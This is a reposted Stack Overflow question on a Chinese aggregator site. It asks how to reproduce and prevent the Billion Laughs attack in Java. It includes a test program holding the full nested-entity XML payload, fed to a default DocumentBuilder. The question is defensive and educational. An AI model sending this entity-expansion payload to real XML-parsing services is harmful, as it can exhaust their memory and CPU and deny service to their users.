1. 技术文章
  2. How can I reproduce and prevent the Billion Laughs attack in Java?

How can I reproduce and prevent the Billion Laughs attack in Java?

江枫思渺然 提交于 2021-02-18 12:18:28

问题


After a bit of research here's a code sample I've come up that I think should be vulnerable to the Billion Laughs attack. However it doesn't seem to be working, Done. is printed to the console much too quickly (instantly from a humans point of view).

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;

public class BillionLOLs {

    public static void vuln(String xml) {

        try{
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            Element root = doc.getDocumentElement();
        } catch (Exception e){

        }
    }

    public static void main(String[] args){

        String xml = 
                "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE lolz ["
                + "<!ENTITY lol \"lol\">"
                + "<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">"
                + "<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">"
                + "<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">"
                + "<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">"
                + "<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">"
                + "<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">"
                + "<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">"
                + "<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">"
                + "]>"
                + "<lolz>&lol9;</lolz>";

        vuln(xml);
        System.out.println("Done.");

    }
}

I've read the OWASP cheat sheet on how to fix this issue in Java and I assume those methods are still up to date, and no other clever attacks have been discovered in the meantime that would make OWASPs guidance irrelevant.

My specific questions are Why doesn't my code take longer to execute like I expect it to and if Java is vulnerable to the Billion Laughs attack how can I prevent it?

The command java -version gives the following output.

java version "1.7.0_75"

Java(TM) SE Runtime Environment (build 1.7.0_75-b13)

Java HotSpot(TM) Client VM (build 24.75-b04, mixed mode, sharing)

来源:https://stackoverflow.com/questions/46282711/how-can-i-reproduce-and-prevent-the-billion-laughs-attack-in-java

标签
java
security
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!